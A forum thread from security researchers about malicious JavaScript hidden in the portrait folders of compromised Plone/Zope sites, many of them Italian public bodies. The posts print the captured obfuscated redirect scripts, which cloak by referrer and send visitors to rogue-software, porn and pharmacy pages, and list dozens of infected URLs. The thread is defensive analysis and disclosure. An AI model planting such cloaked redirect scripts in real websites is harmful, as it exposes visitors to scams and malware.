A new considerable amount of italian sites hosting hidden malware

[Edgar Bangkok]

From some research on the network I found a considerable amount 'of italian sites.  also Public Administration currently hosting hidden pages with automatic links to  malware.
The mechanism and 'simple, it is pages with JavaScript on sites that redirect over  malware  pages automatically, and many of these pages have hosting in italian institutional sites

The search key i use  is the folder path     /portal_memberdata/portraits/ 
If you search in net with /portal_memberdata/portraits/ string  you find many sites subfolder with automatic malware links

more info about this new malware invasion is at

http://edetools.blogspot.com/2008/02/portalmemberdataportraits.html

http://edetools.blogspot.com/2008/02/sembrava-solo-un-caso-isolato-invece.html

and

http://edetools.blogspot.com/2008/02/come-i-parassiti-unaltro-sito-ap-con.html


Edgar from Bangkok 

[JohnC]

The first ones I come across which were not on Italian sites were promoting pharmaceutical sites.

Like:

hxxp://carlosandaudrey.com/portal_memberdata/portraits/buy50mgtramadolbuy

hxxp://cvcet.org.uk/portal_memberdata/portraits/buycodtramadolbuy

Code: [Select]

<script>document.title='Document: Loading... please wait';</script>
<SCRIPT language=javascript>
<!--
function getme(str)
{ var idx = str.indexOf('?'); if (idx == -1) return str; var len = str.length; var new_str = ""; var i = 1; for (++idx; idx < len; idx += 2,i++)
{ var ch = parseInt(str.substr(idx, 2), 16); new_str += String.fromCharCode((ch + i) % 256); } return new_str;
}
var ref=escape(document.referrer); document.write("<script src='" + getme("http://www.live.com/?6772716C3529285C6665675B58601F535E5B1C4F5253164A50541457574355530D4144451A4B164C4937423537413D") + "&ref="+ref+"'></script>");
//--> </SCRIPT>
Which should give the URL:

hxxp://doorgen.com/cgi-bin/stats.cgi?q=tramadol&ref=%68%74%74%70%3a%2f%2f%63%61%72%6c%6f%73%61%6e%64%61%75%64%72%65%79%2e%63%6f%6d%2f%70%6f%72%74%61%6c%5f%6d%65%6d%62%65%72%64%61%74%61%2f%70%6f%72%74%72%61%69%74%73%2f%62%75%79%35%30%6d%67%74%72%61%6d%61%64%6f%6c%62%75%79

Which just leads to pharmaceutical sites:

Code: [Select]

document.write("<scr"+"ipt>do"+"cum"+"ent"+"."+"lo"+"cat"+"ion"+"."+"hr"+"ef='http://www.havepharma.com/?aid=7752&q=tramadol'</scr"+"ipt>");
And:

Code: [Select]

document.write("<scr"+"ipt>do"+"cum"+"ent"+"."+"lo"+"cat"+"ion"+"."+"hr"+"ef='http://www.pharma-next.com/?aid=7752&q=tramadol'</scr"+"ipt>");
Unless you don't use a proper escaped URL as a referrer, in which case it will simply give:

Code: [Select]

function myf(){var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!62!10!100!111!99!117!109!101!110!116!46!119!114!105!116!101!40!39!60!104!49!62!52!48!52!32!69!114!114!111!114!32!45!32!68!111!99!117!109!101!110!116!32!78!111!116!32!70!111!117!110!100!60!47!104!49!62!39!41!59!10!100!111!99!117!109!101!110!116!46!119!114!105!116!101!40!39!60!100!105!118!32!115!116!121!108!101!61!34!100!105!39!43!39!115!112!108!97!121!58!110!111!110!101!34!62!39!41!59!10!60!47!115!99!114!105!112!116!62!10!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} myf();

Code: [Select]

<script>
document.write('<h1>404 Error - Document Not Found</h1>');
document.write('<div style="di'+'splay:none">');
</script>

But then I came across some sites which are what you're talking about I think.

hxxp://www.optiwin.net/portal_memberdata/portraits/inevitt

Code: [Select]

<script type="text/javascript"><!--
if(isse()) sego('ht'+'tp:'+'/'+'/'+
'69.1'+'.7'+'4.16/i'+'n/?');
else location.replace('404.html');
function isse() {
if(isr("&q=")||isr("?q=")||isr("google.")||
isr("msn.")||isr("yahoo.")||isr("altavista.")||
isr("aol.")||isr("ask.")||isr("eureka.com.")||
isr("lycos.com.")||isr("bellsouth.net")) return 1;
return 0;
}
function isr(p){if(document.referrer.indexOf(p)!=-1) return 1;return 0;}
function sego(srv) {
d = 'docu'+'ment.loca'+'tion=';
qstr = 'xq=porn'+'&xkw='+encodeURIComponent('french porn')+
'&xref='+encodeURIComponent(document.referrer)+'&xloc='+
encodeURIComponent(document.location);
code = d+'"'+srv+qstr+'"';eval(unescape(code));
}
--></script>
Just checks if your referrer is a known search engine. If it is, it will direct you to:
http://69.1.74.16/in/?xq=porn&xkw=french%20porn&xref=undefined&xloc=undefined
This IP has already appeared in the domain list for Zlob. But now it will be in there again for promoting Rogue software, because the URL above leads you to:

hxxp://scanner.shredder-scanner.com/5/?advid=1315

However if no search engine was detected as your referrer, then you're simply redirected to:

hxxp://www.optiwin.net/portal_memberdata/portraits/404.html

Is this what you are talking about or is there a driveby installation using exploits? I haven't checked many sites yet, and the .it sites I have checked have been offline.

[Edgar Bangkok]

All i find is italian sites and domains   redirect to others sites not italian (porn, malware, rogue)
All site use page with script in folder /portal_memberdata/portraits/

Maybe some server have Zope HTTP Get Request HTML Injection Vulnerability and this make possible add the code in the /portal_memberdata/portraits/  but i not sure about this.

This is little list about ITALIAN domains hosting bad pages i find
I see before people write about NON ITALIAN sites but my search is only for .IT domains

hxxp://austrian-semester.jrc.it/portal_memberdata/portraits/cmatula
hxxp://sprint.zope.it/portal_memberdata/portraits/bestv
hxxp://guida.uniba.it/portal_memberdata/portraits/mlair
hxxp://guida.uniba.it/portal_memberdata/portraits/lsojourner
hxxp://sprint.zope.it/portal_memberdata/portraits/vodors
hxxp://www.campus.enea.it/cartaeuropeadeiricercatori/portal_memberdata/portraits/vlapeyrouse
hxxp://www.campus.enea.it/portal_memberdata/portraits/gcardinal
hxxp://www.autorinlanga.it/portal_memberdata/portraits/lgitlin
hxxp://sit.provincia.brindisi.it/ptcp/portal_memberdata/portraits/mandree
hxxp://austrian-semester.jrc.it/portal_memberdata/portraits/wsonnenberg
hxxp://www.keilab.it/group/keilab_site/portal_memberdata/portraits/wvelasco
hxxp://www.keilab.it/group/eng/keilab_site/portal_memberdata/portraits/rvaldespino
hxxp://www.adinf.unisa.it/zope/adinf/portal_memberdata/portraits/dcorrigan
hxxp://puntogiovanefidenza.it/portal_memberdata/portraits/nmcguinness
hxxp://plone.comune.sancolombanoallambro.mi.it/portal_memberdata/portraits/mownbey
hxxp://www.albino.it/portal_memberdata/portraits/jmcmiller
hxxp://www.ata.it/portal_memberdata/portraits/rcanaday
hxxp://www.albino.it/portal_memberdata/portraits/gbuege
hxxp://alice.iac.rm.cnr.it/eua4xiac/portal_memberdata/portraits/ScotttHHeeath
hxxp://finnish-semester.jrc.it/portal_memberdata/portraits/naraiza
hxxp://www.ata.it/portal_memberdata/portraits/lboan
hxxp:/sprint.zope.it/portal_memberdata
hxxp://www.adinf.unisa.it/zope/adinf/portal_memberdata/portraits/nmcneel
hxxp://plone.comune.sancolombanoallambro.mi.it/portal_memberdata/portraits/gblamer
hxxp://www.skycube.it/portal_memberdata/portraits/ngennaro
hxxp:/www.entrainfarmacia.it/portal_memberdata
hxxp://www.skycube.it/portal_memberdata/portraits/bbelcher
hxxp://alice.iac.rm.cnr.it/eua4xiac/portal_memberdata/portraits/zbenninger
hxxp://www.swalis.it/portal_memberdata/portraits/dfike
hxxp://puntogiovanefidenza.it/portal_memberdata/portraits/pgranderson
hxxp://tia.geofor.it/portal_memberdata/portraits/gschakel
hxxp://finnish-semester.jrc.it/portal_memberdata/
hxxp://www.waldhof.it/portal_memberdata/portraits/fchan
hxxp://www2.mate.polimi.it:8080/eni/portal_memberdata/
hxxp://tia.geofor.it/portal_memberdata/portraits/tventresca
hxxp://www2.comune.lastra-a-signa.fi.it/news/portal_memberdata/portraits/wpickles
hxxp://www.baldessano.roccati.it/portal_memberdata/portraits/tdeisher
hxxp://www.itisrossi.vi.it/portal_memberdata/portraits/ccoto
hxxp://www.waldhof.it/portal_memberdata/portraits/alytton
hxxp://www.itisrossi.vi.it/portal_memberdata/portraits/rpough
hxxp://www.baldessano.roccati.it/portal_memberdata/portraits/bbreault
hxxp://www.swalis.it/portal_memberdata/portraits/mogara
hxxp://www.scuolapeyronfermi.it/portal_memberdata/portraits/ejaramillo
hxxp://www.promond.it/portal_memberdata/portraits/coverly
hxxp://www.scuolapeyronfermi.it/portal_memberdata/portraits/lhuckleberry
hxxp://www.ilpunto-online.it/portal_memberdata/portraits/tschiff
hxxp://www.centrocongressiagora.it/portal_memberdata/portal_factory/AGmember/enabling_cookies
hxxp://acqua.irsig.cnr.it/JAM/portal_memberdata/portraits/dconsalvo
hxxp://www.colorideibambini.it/portal_memberdata/portraits/hrosillo
hxxp://www.ilpunto-online.it/portal_memberdata/portraits/wcrowley
hxxp://www.tengroup.it/tengroup_manage/portal_memberdata/portraits/wunrue
hxxp://www.colorideibambini.it/portal_memberdata/portraits/ogarlick
hxxp://ebaltea.alteanet.it/Misterbianco/portal_memberdata/portraits/csimonson
hxxp://www.ilboccione.it/portal_memberdata/portraits/aramsey
hxxp://www.itiscartesio.it/web/portal_memberdata/portraits/bsilcox
hxxp://www.ilboccione.it/portal_memberdata/portraits/sshalash
hxxp://ebaltea.alteanet.it/Misterbianco/portal_memberdata/portraits/ejovel
hxxp://www.scuolacarlochiavazza.it/portal_memberdata/portraits/pkleinman
hxxp://catalonia.spacespa.it/portal_memberdata/portraits/bstudy
hxxp://unapsicanalisi.it/portal_memberdata/portraits/JackAddaams

on have also many others italian sites pubblic administration  have same problems.

Edgar from Bangkok

[JohnC]

Thank you for those domains, I see what you mean now